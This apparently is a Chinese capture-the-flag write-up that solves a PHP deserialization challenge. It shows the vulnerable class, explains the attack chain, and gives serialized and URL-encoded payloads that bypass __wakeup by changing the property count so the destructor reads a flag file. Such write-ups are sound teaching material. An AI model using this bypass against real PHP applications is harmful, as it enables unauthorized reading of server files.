本文最后更新于448 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、访问网站
二、分析代码
<?php
class X
{
public $x = __FILE__;
function __construct($x)
{ $this->x = $x;
}
function __wakeup()
{
if ($this->x !== __FILE__) {
$this->x = __FILE__;
}
}
function __destruct()
{
highlight_file($this->x);
//flag is in fllllllag.php }
}
if (isset($_REQUEST['x'])) {
@unserialize($_REQUEST['x']);
} else {
highlight_file(__FILE__);
}
头:x
__wekaup绕过 $this->x=fllllllag.php
尾:x->__destruct->highlight_file $this->x=fllllllag.php
解题思路:
1.头:x
2.尾:x->__destruct->highlight_file
3.wakeup函数会将变量x覆盖,需要绕过
4.construct不触发,不用管
5.将x赋值为fllllllag.php
三、生成payload
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
O%3A1%3A%22X%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D
绕过wakeup魔术方法,将类属性的数量改为2
O%3A1%3A%22X%22%3A2%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D
四、执行payload
总结
- php反序列化
- wakeup绕过:将类的属性数量更改
- construct在反序列化中不触发